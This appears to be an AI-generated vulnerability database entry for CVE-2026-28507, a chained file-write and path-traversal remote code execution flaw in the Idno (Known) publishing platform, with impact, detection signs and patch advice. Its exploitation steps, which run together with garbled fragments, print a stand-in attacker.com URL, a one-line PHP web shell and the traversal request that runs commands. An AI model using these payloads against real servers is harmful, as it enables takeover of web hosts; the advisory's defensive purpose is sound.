
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-28507 is a remote code execution (RCE) vulnerability in Idno (also known as Known), an open-source social publishing platform. It affects all versions prior to 1.6.4 and is exploitable by chaining two weaknesses: an arbitrary PHP file write via WordPress import processing (SSRF + file write) and a local file inclusion via an unsanitized template name parameter. The vulnerability was published on March 6, 2026, and patched in version 1.6.4 released March 1, 2026. It carries a CVSS v3.1 base score of 7.2 (High) and a CVSS v4.0 base score of 8.6 (High) (GitHub Advisory, Red Hat CVE).
The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command). It involves two chained weaknesses in Idno/Core/Migration.php and Idno/Pages/Search/User.php. In the first stage, the importImagesFromBodyHTML() function fetches attacker-controlled URLs during WordPress WXR import, using basename($src) on the raw URL to construct a temp filename — allowing a .tpl.php extension — and a trivially bypassable hostname check (substr_count($src, 'wordpress.com')) that passes for any URL containing the string wordpress.com anywhere in the path. In the second stage, the user search endpoint at /search/users/ accepts a template GET parameter that is passed to draw() in Idno/Core/Bonita/Templates.php, where a regex sanitizer only strips a leading underscore prefix and does not block ../ path traversal sequences, allowing inclusion of any .tpl.php file reachable by the PHP process. The attacker holds the HTTP connection open to keep the temp file on disk during the exploitation window, then triggers its inclusion via the LFI to execute arbitrary OS commands as the web server user (GitHub Advisory).
Successful exploitation grants an attacker full OS-level code execution as the web server user (e.g., www-data), resulting in complete compromise of confidentiality, integrity, and availability of the affected Idno instance. An attacker can read all files accessible to the web server process, modify system data, and execute arbitrary commands, potentially enabling lateral movement within the hosting environment. No persistent artifact remains after exploitation, as the temp file is deleted once the attacker releases the held connection (GitHub Advisory).
A detailed proof-of-concept (PoC) is publicly documented in the GitHub Security Advisory, including sample WXR XML, a Python HTTP server script to hold the connection open, and the specific curl command to trigger RCE. Exploitation requires a web application admin account for the file write stage and any authenticated user account to trigger the LFI/RCE stage. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.0045 (0.45%), indicating low current exploitation probability (GitHub Advisory, Red Hat CVE).
allow_url_fopen is enabled in PHP (default).wordpress.com in the path with a .tpl.php extension, e.g., http://attacker.com/wordpress.com/shell.tpl.php. The file content should be a PHP payload such as <?php system($_GET['cmd']); ?>.<img> tag in a post body whose src attribute points to the attacker-controlled URL./admin/import/ with import_type=WordPress. The application responds immediately and runs the import in the background after a 10-second delay./tmp/{md5(url)}{basename(url)} (e.g., /tmp/594ac6416712b71b978fa4659c4298c3shell.tpl.php).GET /search/users/?query=a&limit=1&template=../../../../../../tmp/594ac6416712b71b978fa4659c4298c3shell&cmd=iddraw() method resolves the path, includes the PHP file, and executes the OS command. The output (e.g., uid=33(www-data)) is returned in the rendered field of the JSON response.file_put_contents returns, and the temp file is deleted, leaving no persistent artifact (GitHub Advisory)./search/users/ with template parameters containing ../ sequences or long hex strings./admin/import/ followed shortly by GET requests to /search/users/ with unusual template parameter values (e.g., ../../../../../../tmp/...); PHP error logs referencing unexpected file includes from /tmp/..tpl.php files in the PHP temp directory (e.g., /tmp/ or systemd private temp mounts like /tmp/systemd-private-*-apache2.service-*/tmp/) with names matching the pattern {md5hash}{basename}.tpl.php; these files may be transient and deleted after exploitation.apache2, php-fpm) such as id, whoami, bash, curl, or wget with no legitimate administrative context (GitHub Advisory).The vendor has released version 1.6.4, which includes fixes for both the image import file write and template validation issues (commits in PR #3344 and #3345). All users running Idno prior to version 1.6.4 should upgrade immediately. As interim mitigations: restrict network access to Idno admin endpoints, disable allow_url_fopen in PHP if not required, and monitor for suspicious file write operations in the PHP temp directory and path traversal attempts in web server logs (GitHub Release, GitHub Advisory).
The vulnerability was reported by security researcher anuraagbaishya and published via GitHub's security advisory system by Idno maintainer benwerd on March 1, 2026. A brief technical write-up was published at infinitsec.net shortly after disclosure. The CVE was also tracked by Red Hat's security advisory system. No significant broader media coverage or notable community controversy has been identified (GitHub Advisory, Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."